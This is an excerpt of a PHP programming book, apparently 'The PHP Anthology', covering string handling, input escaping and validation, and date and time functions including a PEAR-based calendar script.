  • 104. 80 The PHP Anthology uses the htmlentities to turn the ampersand into a valid HTML entity because “&” is a special character in HTML (and XML). The resulting HTML looks like this: <a href="/buy/Ben%20%26%20Jerrys%20Ice%20Cream"> ➥Buy Ben &amp; Jerrys Ice Cream</a> In the URL string, the ampersand has been replaced with %26, and spaces by %20, and the ampersand in the link text has been replaced by &amp;. More considerations arise when you’re outputting strings as a means to prepopulate form fields—perhaps you want to display default data, display user input for con­ firmation purposes, or deal with an error. Again, the htmlentities function gets the job done: <?php $quote = '"So long, and thanks for all the fish!"'; ?> <input type="text" name="fave_quote" value="<?php echo htmlentities($quote); ?>" /> If we use the htmlentities function, we can ensure that the value will display without any issues, even though it contains double quotes. Here is the output of the above code: <input type="text" name="fave_quote" value="&quot;So long, and thanks for all the fish!&quot;" /> The quotes have been transformed to the HTML entity &quot;. When we’re inserting data into a database, it’s considered best practice to insert the data without any escaping transformations intended for output, such as those we just used in transforming strings to HTML. This practice ensures that you can change the output format at will. However, when we insert data into a database we must escape certain characters to ensure that the data doesn’t interfere with the query itself, and to prevent SQL injection attacks. How you escape the data you insert depends on your choice of database; for MySQL, for example, we use the mysql_real_escape_string function.
  • 105. Strings 81 Take a look at this example of some code-escaping string data submitted via a hypo­ thetical form: <?php $first_name = mysql_real_escape_string($_POST['first_name']); $last_name = mysql_real_escape_string($_POST['first_name']); $fave_quote = mysql_real_escape_string($_POST['fave_quote']); $sql = "INSERT INTO my_table (first_name, last_name, fave_quote) ➥ VALUES ('$first_name', '$last_name', '$fave_quote')"; ⋮ proceed with query: mysql_query($sql); echo $sql ?> Use of the mysql_real_escape_string function ensures that no matter what the user submits through our form, it won’t break the SQL we’re trying to execute—it neither causes an error nor allows the user to execute unwanted SQL. Other database management systems have their own specific string escaping functions, too. For example, if you use PostgreSQL or SQLite, you can use pg_escape_string and sqlite_escape_string respectively. PDO users can use PDOStatement->bindParam or the PDO->quote method, which are discussed in “How do I protect my web site from an SQL injection attack?” in Chapter 2. How do I preserve formatting? Imagine you want to output an email to a web page, but in doing so, you want to preserve the formatting of the email—retaining the line breaks. Does PHP have a handy string function available? Solutions You have a choice of two simple approaches to ensure that text formatting is pre­ served on a web page. Firstly, and most simply, you can enclose your text within a <pre> tag. Alternatively, if you don’t want to risk breaking the page layout on long lines, you can convert newline characters to <br /> tags using the nl2br function. You may have a piece of HTML like this:
  • 106. 82 The PHP Anthology <p>Dear Sir or Madam, This is my nicely formatted letter. I hope that it really impresses ➥ you. Look! I've started a new paragraph. Yours faithfully, Mike Format</p> As you probably know, your user will see the following result when this HTML is output: Dear Sir or Madam, This is my nicely formatted letter. I hope that ➥ it really impresses you. Look! I've started a new paragraph. Yours ➥ faithfully, Mike Format But by applying the nl2br function, we can ensure users will see the text as it was formatted: <p>Dear Sir or Madam,<br /> This is my nicely formatted letter. I hope that it really impresses ➥ you.<br /> <br /> Look! I've started a new paragraph.<br /> Yours faithfully,<br /> Mike Format</p> How do I strip HTML tags from text? If you allow your site to be updated by the general public, it’s important to prevent the use of HTML—you want to prevent visitors from posting markup that interferes with your site’s layout. Solution The PHP function strip_tags handles this job almost perfectly. Given some text, strip_tags will eliminate anything that looks like an HTML tag. To be more exact, strip_tags removes any block of text that begins with < and ends with >, while everything other than the tags is left exactly as it was. Here’s a simple example:
  • 107. Strings 83 <?php $text = 'This is <b>bold</b> and this is <i>italic</i>. What about ➥ this <a href="http://www.php.net/">link</a>?'; echo strip_tags($text); ?> This results in the following output: This is bold and this is italic. What about this link? You can also supply strip_tags with a list of allowed tags that you want it to ignore. Let’s alter the above example slightly: echo strip_tags($text, '<b><i>'); This time, strip_tags will ignore the <b> and <i> tags and strip the rest, producing the following output: This is <b>bold</b> and this is <i>italic</i>. What about this link? Discussion As you can see, strip_tags leaves the text between opening and closing tags un­ touched. If it finds a < character but fails to find a matching > character, it will re­ move all the text to the end of the string. Even though it’s the recommended solution, removing HTML with strip_tags does not guarantee that your site will be safe from potential harm to its layout. By allowing certain tags that you consider to be safe for visitors to use, you give visitors the po­ tential to use attributes in those tags—such as style—which can cause problems with your site’s layout. Worse still, the submission of JavaScript contained in a link can result in a cross-site scripting (XSS) security exploit. For more information on XSS and how to prevent it, see the solutions on Chris Shiflett’s site,2 as well as WikiBlog’s page on XSS prevention.3 2 http://shiflett.org/articles/foiling-cross-site-attacks 3 http://wiki.flux-cms.org/display/BLOG/XSS+Prevention
  • 108. 84 The PHP Anthology How do I force text to wrap after a certain number of characters? One function that most developers find very handy is wordwrap. If you have a long string of text that contains no particular formatting, you can use wordwrap to insert a character, such as newline character (n), at a specified interval. wordwrap takes care not to break up words unless you specifically tell it to. This function can be particularly useful when it comes to constructing well-laid-out email messages. Solution To use wordwrap, we simply pass it a string. wordwrap’s default behavior is to wrap the text as close to 75 characters as possible (it won’t break words), inserting a newline character (n) at each breakpoint. In this example, we intend to output HTML, so we supply two extra arguments to change this default behavior: <?php $string = "This is a long sentence that will be cut at sixty ➥ characters automatically. Don't worry, ➥ no words will be broken up."; echo wordwrap($string, 60, "<br />"); ?> With this call, wordwrap wraps the text at 60 characters, and inserts <br /> tags instead of newline characters. Here’s what it outputs: This is a long sentence that will be cut at sixty characters<br /> ➥automatically. Don't worry, no words will be broken up. Thus, we’ve wrangled this unwieldy sentence into something far more manage­ able—without breaking any of the words. How do I perform advanced search and replace operations? PHP comes with a powerful collection of string functions that can be used for search and replace operations. Your first glance at the relevant manual pages on the PHP web site may suggest that these functions are simple, but with a little cunning,
  • 109. Strings 85 there’s much you can accomplish with them.4 The functions str_replace, strpos, and substr_replace are three such examples—they appear simple at first, but we can use them to accomplish complex tasks. str_replace replaces all occurrences of one string in another, strpos returns the position of the first occurrence of one string in another, and substr_replace replaces text within a portion of a string. Solutions The easiest way to search and replace text is using the str_replace function. Let’s consider the following code: <?php $word = 'general-purpose'; $text = <<<EOD PHP (recursive acronym for "PHP: Hypertext Preprocessor") is a widely used Open Source general-purpose scripting language. EOD; echo str_replace($word, '<strong>' . $word . '</strong>', $text); ?> The above example performs a very simple search and replace operation that helps us add HTML markup to text. In this case, the string “general-purpose” in the text is wrapped with a <strong> tag, and produces the following output: PHP (recursive acronym for "PHP: Hypertext Preprocessor") is a widely used Open Source <strong>general-purpose</strong> ➥ scripting language. The substr_replace function provides control over how text is to be replaced, but to use it, we need to specify the location and length of the replacement. For example, if we only wanted to find the first instance of the text we wanted to replace, we could try this: 4 http://www.php.net/strings/
  • 110. 86 The PHP Anthology <?php function addTag($text, $word, $tag) { $length = strlen($word); $start = strpos($text, $word); $word = '<' . $tag . '>' . $word . '</' . $tag . '>'; return substr_replace($text, $word, $start, $length); } $text = <<<EOD PHP (recursive acronym for "PHP: Hypertext Preprocessor") is a widely used Open Source general-purpose scripting language. EOD; echo addTag($text, 'general-purpose', 'strong'); ?> Here we’ve created a function, addTag, which wraps an HTML tag around the first occurrence of a specified word. To perform this task using substr_replace, we have to find the length of the word, using strlen, and its position within the text, using strpos. substr_replace is very flexible. If you specify a negative value for the $start argu­ ment, it will begin the replacement operation counting from the end of the text in­ stead of the beginning. The $length argument, which represents how much of the original text to replace, is optional. If this argument is omitted, the whole string is replaced. If it’s set to zero, no text is replaced—the replacement string is inserted into the text at the location specified by the $start parameter. A negative value setting represents the number of characters from the end of the text at which it will stop the replacement operation. How do I break up text into an array of lines? Let’s say that you have information contained within a string value that you’d like to split up into separate values, such as a list of tags separated by commas, or a list of items separated by newline characters. What’s the best way to complete this task? Solution If we assume that our piece of text contains line feed characters, we can use the explode function to break it up into an array of lines:
  • 111. Strings 87 <?php $text = <<<EOD This will be row 1 This will be row 2 This will be row 3 This will be row 4 EOD; $lines = explode(PHP_EOL, $text); echo '<table border="1">' .PHP_EOL; foreach ($lines as $line) { echo '<tr>' .PHP_EOL. '<td>' .$line. '</td>' .PHP_EOL. '</tr>' . PHP_EOL; } echo '</table>' .PHP_EOL; ?> This script uses explode to break the text at the line feed characters and place the text into an array. The PHP_EOL constant—the current operating system’s end of line (EOL) character—is used for the line feed character to make the script more portable. The array is then used to build an HTML table, which you can see in Figure 3.1. Figure 3.1. Using explode to output text as a table Discussion It’s useful to know that the implode function does exactly the opposite of what we’ve seen here—it builds a string out of an array. Let’s add the following line to the above example: echo implode($lines, PHP_EOL); Here’s the resulting output of our original string:
  • 112. 88 The PHP Anthology This will be row 1 This will be row 2 This will be row 3 This will be row 4 How do I trim whitespace from text? When we’re dealing with form submissions, among other tasks, we often need to consider whitespace. Sometimes it’s submitted by the user in error—it is hard to see, after all. It may also be submitted on purpose by users who want to avoid filling in fields, for example. The presence of whitespace in submitted data can cause problems for your applic­ ation—the erroneous inclusion of whitespace could result in the storage of incorrect usernames or email addresses, for instance—so it’s useful to be able to trim the whitespace from submitted form values. Solution The trim function is another handy PHP tool. It removes whitespace characters at the start and end of strings, and works like this: <?php $string = ' This has whitespace at both ends '; // Remove that whitespace $string = trim($string); if (strlen($string) > 0) { ⋮ It's not just spaces… } ?> This straightforward function allows us to make sure that a user can’t send us spaces instead of real data. If we merely want to trim whitespace from the left- or right- hand side of a string, we can use ltrim or rtrim respectively. How do I output formatted text? In certain situations text needs to be formatted in a specific way—when we’re working with prices, column alignments, and dates, for example.
  • 113. Strings 89 Solution The powerful printf and sprintf functions output a formatted string according to special formatting directives, the former displaying the output to the screen, the latter to a string. Formatting directives take the form of a % character followed by one or more directive elements. Here’s an example: <?php $fruit = array('banana', 'mango', 'pear'); $price = array('30', '50', '35'); $format = 'A %s costs %d cents.<br />'; for ($i = 0; $i < 3; $i++) { printf($format, $fruit[$i], $price[$i]); } ?> This script produces the following output: A banana costs 30 cents. A mango costs 50 cents. A pear costs 35 cents. In this example, $format contains special characters, %s and %d, which printf and sprintf recognize and replace with the values we supply as arguments. The argu­ ments are swapped with values in the same order in which they’re passed to the function: %s will format a value as a string and %d will format the value as a number. To vary the order in which the values appear in the output, we can simply change the format string without having to change the order of the arguments passed to the printf or sprintf functions. Let’s use the array of values from the first example, but change the output such that the values appear in a different order: $format = '%2$d cents will buy you a %1$s.<br />'; for ($i = 0; $i < 3; $i++) { printf($format, $fruit[$i], $price[$i]); } The %2$d format character will format the second argument as a number. If you need to double-quote your format string for the sake of variable interpolation, you’ll
  • 114. 90 The PHP Anthology need to escape the $ character. For example, here’s the format string we’d need if we wanted to add a newline character, n, at the end: $format = "%2$d cents will buy you a %1$s.<br />n"; These examples are very simple, but formatting directives such as padding, align­ ment, or floating point precision can be quite complex. For more details, refer to the sprintf page in The PHP Manual.5 How do I validate submitted data? Validating strings is an important part of implementing a web page form. How can you make sure that the data a user submits through a form is what it’s supposed to be—a URL or an email address, for example? The submission of invalid data is a very common problem. Solution The typical approach to validation includes using plenty of regular expressions. Fortunately, PEAR::Validate is here to help, so we don’t need to reinvent the wheel. PEAR::Validate offers a main class for validating strings and values that are common to web applications, as well as a growing number of related internationalized classes for dealing with country-specific requirements like UK postcodes and social security numbers for residents of the USA. Each class contains a collection of static methods (methods that can be called without constructing an object from the class) that are used to validate a particular value. Here’s how we might use three of the methods available in the main Validate class—namely string, email, and url—to validate the data received through a form: pear_validate.php (excerpt) error_reporting(E_ALL); require_once 'strip_quotes.php'; require_once 'Validate.php'; 5 http://www.php.net/sprintf/
  • 115. Strings 91 $errors = array('name' => '', 'email' => '', 'url' => ''); if (isset($_POST['submit'])) { $name_options = array( 'format' => VALIDATE_ALPHA . VALIDATE_SPACE, 'min_length' => 5 ); if (!Validate::string($_POST['name'], $name_options)) { $errors['name'] = ' class="error"'; } if (!Validate::email($_POST['email'])) { $errors['email'] = ' class="error"'; } if (!Validate::url($_POST['url'])) { $errors['url'] = ' class="error"'; } } First, we turn off E_STRICT error reporting with the error_reporting function be­ cause the PEAR::Validate will generate E_STRICT errors. You can read more about this and other error-handling topics in Chapter 9. Next, we include strip_quotes.php and the PEAR::Validate package. strip_quotes.php contains code that handles magic quotes (which you can read more about in the section called “Checking for Magic Quotes” in Chapter 1). We also create an array in the $errors variable to store the results of the field validation. Then, having tested to see that the form was submitted, we call the validate methods statically to check the fields. The first check ascertains that the data in the name field is a string containing only letters from the alphabet or space characters, and is at least five characters long—this validation requirement is a custom requirement, and we define it with our $name_options array. Next, we simply need to call the methods Validate::email and Validate::url in order to check the email and url fields submitted via the form. Note that if we pass the value true as the second argument, PEAR::Validate checks the existence of the specified host name against DNS, using PHP’s checkdnsrr function. Note also
  • 116. 92 The PHP Anthology that this validation causes a time delay as the host communicates with the nearest DNS server. In our $errors array, we store an empty string if the validation passes, and ‘ class="error"' if the validation fails. We insert this string into our form’s <label> tags. The addition of ‘ class="error"' to the label elements allows us to provide to users some visual feedback via CSS to indicate a validation error. Here’s the code for the form itself: pear_validate.php (excerpt) <form class="userinfo" action="<?php echo $_SERVER['SCRIPT_NAME']; ?>" method="post"> <?php $name = isset($_POST['name']) ? $_POST['name'] : ''; $email = isset($_POST['email']) ? $_POST['email'] : ''; $url = isset($_POST['url']) ? $_POST['url'] : ''; ?> <legend>Enter your details</legend> <div> <label<?php echo $errors['name']; ?>>Name:</label> <span> <input type="text" name="name" value="<?php echo $name; ?>" /> </span> </div> <div> <label<?php echo $errors['email']; ?>>Email:</label> <span> <input type="text" name="email" value="<?php echo $email; ?>" /> </span> </div> <div> <label<?php echo $errors['url']; ?>>Website:</label> <span> <input type="text" name="url" value="<?php echo $url; ?>" /> </span> </div> <div> <span> <input type="submit" name="submit" value="send" />
  • 117. Strings 93 </span> </div> </form> When it’s viewed in a browser, the form will look something like Figure 3.2. Figure 3.2. The form displaying before validation When we rebuild the form after submission, we use the $errors array and some CSS to highlight form labels with red: pear_validate.php (excerpt) .error { color: red; font-weight: bold; } This lets users know which part of the input was invalid, as shown in Figure 3.3.
  • 118. 94 The PHP Anthology Figure 3.3. The form displaying after validation Of course, merely changing the color of the labels to red is not very informative; you can improve this example by adding field validation messages to let users know exactly how to fix the validation problems. Discussion Validating user input and communicating errors to the user is one of the most vital tasks you will perform as a web developer. Of course, if PEAR::Validate is simply too complex for your needs, you may find the built-in ctype_* functions are more to your liking.6 Just remember: in the interests of security, it’s imperative that you validate all user input, and that you escape it before outputting it as HTML or saving it to your database. Summary You should now have a good idea of what can be achieved with PHP’s normal string functions. If you can get by just using those, do so—they’re fast and easy to use, and are far less prone to error than are regular expressions. String manipulation is the core of what we PHP developers do. From user input to application output—HTML to a browser, SQL to a database—knowing how to handle strings safely, securely, and efficiently is one of the most important skills a PHP professional can have. 6 http://www.php.net/c_type/
  • 119. 4 Chapter Dates and Times Wouldn’t it be nice if we had a ten-day week? How about 100 minutes in an hour? Ten months each year? Dates and times are probably something you take for granted. You deal with them every day and are probably unaware of the clever mathematical algorithms your brain uses to anticipate how long you have to wait before Friday evening comes around again. It’s only when you start programming with dates and times that you realize that what you’ve taken for granted all these years is not so easy to deal with in code. Blame it on the Romans! In our day-to-day lives, we’re used to working with decimal (base ten) numbers, which are optimized for dealing with groups of ten (ten ones in ten, ten tens in a hundred, ten hundreds in a thousand, and so on). I’ll avoid giving you a math lecture, but basically the problem with dates and times is that they don’t break down neatly into groups of ten. Consider this: ■ In one second you have one thousand milliseconds. No problem. ■ In one minute you have 60 seconds. ■ In one hour you have 60 minutes.
  • 120. 96 The PHP Anthology ■ In one day you have 24 hours. So, how do you calculate the number of days given a value in milliseconds? That’s a stack of long division! And that’s just time—what about dates? ■ In one week, you have seven days (does your week begin on Sunday or Monday?). ■ In one month you have … er … you don’t know exactly how many days or weeks; it depends on the month (and let’s not get started on leap years!). ■ In one year, you have 12 months. Of course, that’s easy enough. How about making it more difficult? You often need to be able to express a date in multiple formats such as “Tuesday 18th March, 2003,” “03/18/03” (USA format), “18/03/03” (European format), “18th Mar 2003,” and “20030318” (a MySQL-style timestamp), not to forget “1047942000” (a Unix timestamp)! How do you plan to display a list of articles fetched from a database and ordered by date? What if you want to present something more complex, such as an online calendar? As you can see, there’s a lot to think about when working with dates and times in your applications. Fortunately, PHP really helps when it comes to making times and dates as painless as possible, thanks to powerful functions like date, but it’s important to develop the right strategy for dealing with dates and times early in your career as a PHP programmer. Take the right approach from day one, and you’ll avoid having to go back later and write insanely complex code to fix the mistakes you made as a newbie. In this chapter, we’ll be looking at the kinds of strategies you can employ, and solving some of the common problems you’ll face when it comes to programming dates and times. How do I use Unix timestamps? Timestamps are numbers that identify dates and times in a format that can be used to solve the types of problems you’ll typically encounter in your applications; they make it easier to perform operations such as ordering a list or comparing two dates. As a PHP developer, you’re likely to come across two types of timestamps: Unix timestamps and MySQL (or other database management system) timestamps.
  • 121. Dates and Times 97 Unix timestamps are generally the most effective format in which to represent and manipulate date and time values—they’re a simple solution to a tricky problem. A Unix timestamp reflects the number of seconds that have passed since the epoch: January 1, 1970, 00:00:00 GMT. Converting dates to their Unix timestamps makes date- and time-related calculations easy in PHP. Let’s have a look at how they work. Solution PHP provides functions such as time and mktime to help us deal with Unix timestamps. time will return the current time as a Unix timestamp. The global variable $_SERVER['REQUEST_TIME'] will return the timestamp of the current request from PHP 5.1. mktime will return a timestamp for a specified date. We use mktime like this: $timestamp = mktime($hour, $minute, $second, $month, $day, $year); Discussion The downside of Unix timestamps is that, unless you’re some kind of savant, they’re not human-readable. If I was to tell you that 1047994036 was the number of seconds that had passed since January 1, 1970, how fast could you tell me what the date was? The other problem with Unix timestamps is that they can only be used within a limited date range, depending on your operating system. On Linux-based systems, you should be able to go back to somewhere around 1902, and forward as far as 2037. On Windows-based operating systems, the oldest date may be as recent as January 1, 1970. The problem lies in the size of the number used to represent the time value. Any operating system can easily handle integer numbers up to a certain size ( 4,294,967,296 for current 32-bit operating systems), after which it must work harder to juggle oversized numbers. For the sake of efficiency, therefore, operating systems usually impose this “maxim­ um” size on important values like dates and times. Linux, at least, allows you to have negative integer values for dates; it’ll let you work with dates occurring before January 1, 1970, while PHP on Windows may complain about such dates. Moreover, on the flip side of this issue, another potentially Y2K-like problem that will affect all 32-bit operating systems still in existence looms over the date January 19, 2038.
  • 122. 98 The PHP Anthology Perform a Google search for that date and you’ll see what I mean. Although 2038 is a long way off and the timestamp issue may influence no more than your choice of pacemaker, it’s worth bearing this glitch in mind if you’re planning an application that will need to work with dates from the distant past or future (perhaps on a history web site). To see the problem in action, try running the following script on as many different operating systems as you can: <?php echo '1st Jan 1899: ' . mktime(0, 0, 0, 1, 1, 1899) . '<br />'; echo '1st Jan 1902: ' . mktime(0, 0, 0, 1, 1, 1902) . '<br />'; echo '31st Dec 1969: ' . mktime(0, 0, 0, 12, 31, 1969) . '<br />'; echo '1st Jan 1790: ' . mktime(0, 0, 0, 1, 1, 1970) . '<br />'; echo '1st Jan 1937: ' . mktime(0, 0, 0, 1, 1, 2037) . '<br />'; echo '1st Jan 2038: ' . mktime(0, 0, 0, 1, 1, 2038) . '<br />'; echo '19th Jan 2038: ' . mktime(0, 0, 0, 1, 19, 2038) . '<br />'; echo '20th Jan 2038: ' . mktime(0, 0, 0, 1, 20, 2038) . '<br />'; echo '1st Jan 2039: ' . mktime(0, 0, 0, 1, 19, 2039) . '<br />'; ?> Depending on your operating system—it’s a particular problem on Windows—this example may generate a range of different PHP warning errors. Another aspect to be aware of when you’re dealing with Unix timestamps is that they vary in length; a timestamp from January 2, 1970 will obviously be shorter than a contemporary timestamp. In general, a column size of 11 (INT(11)) should be more than enough to keep your application running for the next few hundred years (assuming it’s not running on a 32-bit operating system, of course) when you place Unix timestamps in your database. How do I obtain the current date? Simple as it may seem, obtaining the current date can soon become tricky. With a multitude of possible client and server timezones and daylight-saving time shifts in action at any given point in time, you can see how this exercise can quickly be­ come more complicated than it first appears.
  • 123. Dates and Times 99 Solution The simplest way to obtain the current date according to your server is to use the time function. time returns a Unix timestamp for the current date. We can use the date function to format that date for human consumption: <?php $timestamp = time(); echo date("F jS, Y", $timestamp); // November 7th, 2006 ?> The first argument to date is a series of placeholders that specify the format for the date. The most common placeholders can be seen in Table 4.1. If you fail to specify a timestamp argument, date defaults to the current date. Discussion A problem with simply calling the time function is that the time returned is that of the server’s timezone—not your or your visitor’s timezone. To address this problem, we can use the date.timezone setting in php.ini or the date_default_timezone_set function, which will change the timezone for all date- related functions: <?php $timestamp = time(); echo date("F jS, Y", $timestamp) . '<br />'; // August 24th, 2007 date_default_timezone_set('America/New_York'); echo date("F jS Y H:i:s") . '<br />'; // August 24th, 2007 03:06:29 date_default_timezone_set('Africa/Cairo'); echo date("F jS Y H:i:s"); // August 24th, 2007 10:06:29 ?>
  • 124. 100 The PHP Anthology Table 4.1. Most Common Placeholders Placeholder Description d day of the month, two digits with leading zeros D a textual representation of a day, three letters j day of the month without leading zeros l (lowercase L) a full textual representation of the day of the week S English ordinal suffix for the day of the month, two characters F a full textual representation of a month, such as January or March m numeric representation of a month, with leading zeros M a short textual representation of a month, three letters n numeric representation of a month, without leading zeros t number of days in the given month L whether or not it’s a leap year Y a full numeric representation of a year, four digits y a two-digit representation of a year a lowercase am or pm A uppercase AM or PM g 12-hour format of an hour without leading zeros G 24-hour format of an hour without leading zeros h 12-hour format of an hour with leading zeros H 24-hour format of an hour with leading zeros i minutes with leading zeros s seconds with leading zeros I (capital i) whether or not the date is in daylight saving time O difference to Greenwich time (GMT) in hours P difference to Greenwich time (GMT) with colon between hours and minutes (added in PHP 5.1.3) T timezone setting of this machine
  • 125. Dates and Times 101 How do I find a day of the week? We arrange our lives by the days of the week. When we humans talk about dates, we often use phrases like “next Tuesday” or “last Wednesday.” It’s easier for us to understand dates this way than, say reading a date and having to work out that it means next Tuesday. So, given any date, say “May 31st 1984,” in an arbitrary format, how can we easily determine the day of the week this date represents? Solution Rather than trying to write a complex parser to convert our date to a timestamp, and then performing complex mathematics to subtract the number of seconds that have occurred since the date and so forth, we simply pass the date to the strtotime function. The strtotime function has a seemingly limitless ability to understand dates and convert them automatically to a Unix timestamp, which we can then use with the date function and the l (lowercase L) placeholder. Here’s strtotime in action: <?php $timestamp = strtotime("May 31st 1984"); $weekday = date("l", $timestamp); echo $weekday; // Thursday ?> How do I find the number of days in a month? A common task, especially when writing date-based applications such as calendars, is to find the number of days in a month. And don’t forget that tricky month—Feb­ ruary! Fortunately, it’s easy to obtain the number of days in a month using PHP. Solution We use the strtotime function and the date function, with the t placeholder, to gain this information easily:
  • 126. 102 The PHP Anthology <?php $timestamp = strtotime("October"); $days = date("t", $timestamp); echo $days; // 31 ?> How do I create a calendar? There comes a time in the lives of all developers when they encounter the intimid­ ating task of creating a calendar of some description. Knowing where to begin is often the first hurdle. Solution As you’re probably beginning to discern from our previous discussion, strtotime is a very powerful function. In fact, you’ve seen only a small portion of its abilities so far. As well as calendar dates, strtotime allows you to pass in more arbitrary, human-readable expressions, such as +1 week, next friday, last saturday or even +1 year 6 months 38 days 15 hours 26 minutes 12 seconds. By utilizing strtotime’s impressive capabilities, and with a little help from PEAR’s 1 HTML_Table_Matrix class, we can create a simple calendar with remarkable ease. Let’s get started: calendar.php (excerpt) error_reporting(E_ALL); require_once "HTML/Table/Matrix.php"; define("EMPTY_COLUMN", ""); First, we turn off E_STRICT error reporting with the error_reporting function be­ cause PEAR::HTML_Table_Matrix will generate E_STRICT errors—you can read more about this and other error-handling topics in Chapter 9. Next, we include the HTML_Table_Matrix package, and define a constant, EMPTY_COLUMN, in order to make our code more readable. Next, we perform validation on the month-and-year values: 1 You can read all about HTML_Table_Matrix at http://pear.php.net/package/HTML_Table_Matrix/docs/1.0.5/HTML_Table_Matrix/HTML_Table_Matrix.html.
  • 127. Dates and Times 103 calendar.php (excerpt) $months = array("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"); if (isset($_GET['month']) && in_array($_GET['month'], $months)) { $month = $_GET['month']; } else { $month = date("F"); } if (isset($_GET['year']) && is_numeric($_GET['year']) && $_GET['year'] >= 1970 && $_GET['year'] <= 2038) { $year = $_GET['year']; } else { $year = date("Y"); } Above, we defined an array of allowed values for the $month variable. This is our whitelist, which is used to make sure a valid month is passed. If no value, or an invalid value is passed, we use the current month. To complete our input validation, we make sure that the $_GET['year'] value is between 1970 and 2038. Again, if no value or an invalid value is passed, we use the current year. The next step is to get the timestamps for the first day and the last day of the given month in the given year: calendar.php (excerpt) $start_date = strtotime("$month 1st $year"); $end_date = strtotime("$month " .date("t", $start_date). " $year"); We then create an array of numbers that represent the first to the last day of the month:
  • 128. 104 The PHP Anthology calendar.php (excerpt) $date_range = range(1, date("t", $start_date)); Here, we use the -1 month and +1 month modifiers to create timestamps for the previous and next months, and do the same for the previous and next years: calendar.php (excerpt) $previous_month = strtotime("-1 month", $start_date); $next_month = strtotime("+1 month", $start_date); $previous_year = strtotime("-1 year", $start_date); $next_year = strtotime("+1 year", $start_date); To make life simpler and to avoid duplication, we use sprintf and the following string formatter to create the links that will allow users to move backward and for­ ward by one year or one month: calendar.php (excerpt) $html = "<a href='" . $_SERVER['SCRIPT_NAME'] . "?month=%s&amp;year=%s'>%s</a>"; Next, we start to create an array that represents our calendar. Here we construct our first table row, which consists of a link to show the previous year. This is followed by text that represents the current year being viewed, and finally, a link to show the next year. We use the EMPTY_COLUMN constant to denote columns that should be left empty: calendar.php (excerpt) if (date("Y", $previous_year) >= 1970) { $calendar_data[] = sprintf($html, date("F", $start_date), date("Y", $previous_year), date("Y", $previous_year)); } else { $calendar_data[] = EMPTY_COLUMN; }
  • 129. Dates and Times 105 $calendar_data[] = EMPTY_COLUMN; $calendar_data[] = EMPTY_COLUMN; $calendar_data[] = date("Y", $start_date); $calendar_data[] = EMPTY_COLUMN; $calendar_data[] = EMPTY_COLUMN; if (date("Y", $next_year) < 2038 && date("Y", $next_year) != 1969) { $calendar_data[] = sprintf($html, date("F", $start_date), date("Y", $next_year), date("Y", $next_year)); } else { $calendar_data[] = EMPTY_COLUMN; } The next row is similar to the previous one, except that it shows links for the previ­ ous month, followed by the currently viewed month and the link for the next month, in that order: calendar.php (excerpt) $calendar_data[] = sprintf($html, date("F", $previous_month), date("Y", $previous_month), date("M", $previous_month)); $calendar_data[] = EMPTY_COLUMN; $calendar_data[] = EMPTY_COLUMN; $calendar_data[] = date("M", $start_date); $calendar_data[] = EMPTY_COLUMN; $calendar_data[] = EMPTY_COLUMN; $calendar_data[] = sprintf($html, date("F", $next_month), date("Y", $next_month), date("M", $next_month)); The third row simply consists of the days of the week, starting from Monday: calendar.php (excerpt) $calendar_data[] = "Mon"; $calendar_data[] = "Tue"; $calendar_data[] = "Wed"; $calendar_data[] = "Thu";
  • 130. 106 The PHP Anthology $calendar_data[] = "Fri"; $calendar_data[] = "Sat"; $calendar_data[] = "Sun"; To make sure that the numeric dates synchronize to the date of the week, we first insert a number of blank columns. We use the N placeholder in the date function so it returns the numeric day of the week on which the first of the month will fall, and using a for loop, we add the EMPTY_COLUMN constant for the remaining days: calendar.php (excerpt) $blank_days = date("N", $start_date); for ($i = 1; (int) $blank_days > $i; $i++) { $calendar_data[] = EMPTY_COLUMN; } We then add the numeric days of the current month to the calendar data array. Next, we instantiate our HTML_Table_Matrix object and pass our array to the setData method. And finally, we create a left-to-right, top-to-bottom HTML_Table_Matrix_Filler object so that our HTML_Table_Matrix can work out the rows and columns required for the final output: calendar.php (excerpt) foreach ($date_range as $day) { $calendar_data[] = $day; } $calendar = new HTML_Table_Matrix(); $calendar->setTableSize(8,7); $calendar->setData($calendar_data); $filler = HTML_Table_Matrix_Filler::factory("LRTB", $calendar); $calendar->accept($filler); We use the toHTML method to display our results:
  • 131. Dates and Times 107 calendar.php (excerpt) <h1>PHP Calendar</h1> <div id="cal"> <?php echo $calendar->toHTML(); ?> </div> The finished product can be seen in Figure 4.1. Figure 4.1. A calendar generated using PEAR::HTML_Table_Matrix And there you have it. Be intimidated no more! Keep this solution handy in your PHP toolkit and you’ll be able to whip up a calendar in no time at all, no matter what the application. How do I store dates in MySQL? Human-readable dates come in a variety of formats that can suit many situations. However, these formats are not the best way to store dates. At first glance, the easiest way to store dates in MySQL may appear to be to simply drop them in exactly as they’d appear on a web page; for example, “8th March 2003”. Be warned—taking this route is the first step on the path to serious hair loss and ulcers. For example, the WHERE clause in an SQL statement run against MySQL will not allow you to do things like this:
  • 132. 108 The PHP Anthology SELECT * FROM table WHERE date > '14th February 2007' '14th February 2007' is not a date value—it’s only a date represented by a string. It can’t be manipulated or compared as a date value until it is converted into such a value. If you store your dates as strings you’ll be forever converting them to and from date value data types. And who needs that kind of headache? Solution A far better way to store date information is to use a MySQL timestamp. To get the current time, in the current server’s local timezone, we can use the NOW or CURRENT_TIMESTAMP functions. We can also use the UTC_TIMESTAMP to obtain the UTC timezone timestamp: mysql> SELECT CURRENT_TIMESTAMP(); +---------------------+ | CURRENT_TIMESTAMP() | +---------------------+ | 2007-11-05 21:18:28 | +---------------------+ mysql> SELECT NOW(); +---------------------+ | NOW() | +---------------------+ | 2007-11-05 21:18:32 | +---------------------+ mysql> SELECT UTC_TIMESTAMP(); +---------------------+ | UTC_TIMESTAMP() | +---------------------+ | 2007-11-06 02:18:44 | +---------------------+ Discussion MySQL timestamps are simpler than Unix timestamps. The generalized form is YYYY-MM-DD HH:MM:SS and is typically stored in a column of type DATETIME (not to be confused with the column types DATE and TIME, which store only YYYY-MM-DD and HH:MM:SS respectively).
